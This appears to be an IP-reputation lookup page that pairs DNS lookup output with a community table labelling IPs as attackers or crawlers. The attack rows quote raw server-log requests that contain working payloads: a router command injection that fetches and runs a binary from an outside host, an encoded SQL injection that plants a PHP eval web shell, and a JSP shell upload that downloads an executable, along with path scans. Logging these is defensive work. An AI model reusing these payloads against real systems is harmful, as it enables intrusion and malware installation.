City: unknown
Region: unknown
Country: Netherlands (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 20.86.45.32
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39920
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;20.86.45.32. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020600 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 06 23:41:55 CST 2025
;; MSG SIZE rcvd: 104
Host 32.45.86.20.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 32.45.86.20.in-addr.arpa: NXDOMAIN
| IP | Type | Details | Datetime |
|---|---|---|---|
| 122.114.158.230 | attack | 122.114.158.230 - - [04/Apr/2019:09:15:21 +0800] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 101457 "http://eznewstoday.com//index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" |
2019-04-04 09:16:20 |
| 115.199.238.65 | spamattack | 115.199.238.65 - - [04/Apr/2019:03:57:15 +0800] "GET //plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 516 "http://www.mafengwo.cn/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\\xa3\\xa9" |
2019-04-04 06:44:48 |
| 66.249.66.138 | bots | Googlebot,谷歌爬虫网段 |
2019-03-28 17:38:35 |
| 212.156.221.177 | attack | 212.156.221.177 - - [02/Apr/2019:12:04:50 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://174.138.11.85/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-02 12:05:51 |
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:15:40:52 +0800] "GET /super.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:15:40:52 +0800] "GET /ww.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:42 |
| 111.206.198.27 | bots | 111.206.198.27 - - [29/Mar/2019:00:20:15 +0800] "GET /wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1.0 HTTP/1.1" 200 4303 "http://www.eznewstoday.com/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" Baidu render爬虫,爬一些静态文件 |
2019-03-29 09:07:10 |
| 118.25.49.95 | attack | 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-01 11:50:45 |
| 178.154.244.50 | bots | 俄罗斯的搜索引起爬虫,类似中国百度 178.154.244.50 - - [29/Mar/2019:08:14:24 +0800] "GET /index.php/category/big-shots/duterte/page/11/ HTTP/1.1" 200 18690 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" |
2019-03-29 09:14:17 |
| 45.40.194.24 | attack | 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /pwd/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmina/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMydmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" |
2019-04-03 06:19:58 |
| 42.236.10.84 | bots | 没有UA的360爬虫 42.236.10.84 - - [03/Apr/2019:08:55:07 +0800] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.1.1 HTTP/1.1" 200 1017 "https://www.eznewstoday.com/index.php/2019/04/03/amazon_2019_04_03_cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 42.236.10.75 - - [03/Apr/2019:08:55:07 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 200 4864 "https://www.eznewstoday.com/index.php/2019/04/03/amazon_2019_04_03_cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" |
2019-04-03 09:08:57 |
| 42.236.10.153 | bots | 360爬虫,偶尔被GA认为是人类正常访问 |
2019-03-28 20:21:34 |
| 183.57.53.177 | attack | 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /info1.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /p.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /info1.php HTTP/1.1" 404 209 "http://118.25.52.138/info1.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /p.php HTTP/1.1" 404 209 "http://118.25.52.138/p.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:23 |
| 101.226.79.190 | attack | 101.226.79.190 - - [01/Apr/2019:15:53:42 +0800] "GET /56.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.79.190 - - [01/Apr/2019:15:53:42 +0800] "GET /56.php HTTP/1.1" 404 209 "http://118.25.52.138/56.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [01/Apr/2019:15:53:42 +0800] "GET /knal.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [01/Apr/2019:15:53:43 +0800] "GET /knal.php HTTP/1.1" 404 209 "http://118.25.52.138/knal.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.79.190 - - [01/Apr/2019:15:53:53 +0800] "GET /fusheng.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.79.190 - - [01/Apr/2019:15:53:53 +0800] "GET /fusheng.php HTTP/1.1" 404 209 "http://118.25.52.138/fusheng.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:54:21 |
| 180.153.234.234 | bots | 360爬虫列表
180.153.232.*
180.153.234.*
180.153.236.*
180.163.220.*
42.236.101.*
42.236.102.*
42.236.103.*
42.236.10.*
42.236.12.*
42.236.13.*
42.236.14.*
42.236.15.*
42.236.16.*
42.236.17.*
42.236.46.*
42.236.48.*
42.236.49.*
42.236.50.*
42.236.51.*
42.236.52.*
42.236.53.*
42.236.54.*
42.236.55.*
42.236.99.* |
2019-03-28 20:23:09 |
| 118.25.71.65 | attack | 攻击型IP 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 20:42:33 |